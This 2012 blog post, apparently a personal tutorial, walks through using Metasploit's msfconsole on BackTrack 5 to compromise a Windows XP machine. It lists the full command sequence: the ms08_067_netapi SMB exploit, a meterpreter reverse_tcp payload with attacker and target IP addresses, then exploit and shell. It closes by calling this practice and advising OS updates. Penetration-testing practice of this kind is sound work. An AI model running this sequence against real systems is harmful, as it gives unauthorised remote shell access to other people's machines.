Sunday, June 10, 2012

Hacking target windows XP using msfconsole


The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.
The msfconsole interface will work on Windows with the 3.3 release, however users of version 3.2 will need to either manually install the Framework under Cygwin, along with patching the Ruby installation, or access the console emulator via the included web or GUI components.
Benefits
It is the only supported way to access most of the features within Metasploit.
·         Provides a console-based interface to the framework
·         Contains the most features and is the most stable MSF interface
·         Full readline support, tabbing, and command completion
Here I have learn new things how to hack to windows XP using the metasploit provided by backtrack 5
These are the steps that you need to follow.
1. Boot up Backtrack VM and start up X Windows by running startx
2. Type "cd /pentest/exploits/framework"
3. Run ./msfconsole (It Will take few seconds to run)

4. Inside metasploit, run "search windows/smb"

5. You will see that one of the exploit is: "use exploit/windows/smb/ms08_067_netapi"
6. To learn about this exploit, run "info exploit/windows/smb/ms08_067_netapi"


7. Then when ready, you can run "use exploit/windows/smb/ms08_067_netapi"
8. Run "show payloads" to view payloads

9. You will see one of the payload is: "windows/meterpreter/reverse_tcp"
10. Set payload "windows/meterpreter/reverse_tcp"

11. Set LHOST 131.107.1.200 (IP Address of Backtrack)
12. Set RHOST 131.107.1.222 (IP Address of Win XP SP2)
13. Exploit
14. Shell

Then you ready to surf your target systems.

This is only a practice to know how to use the metasploit. to prevent this happen try to update your OS.

No comments:

Post a Comment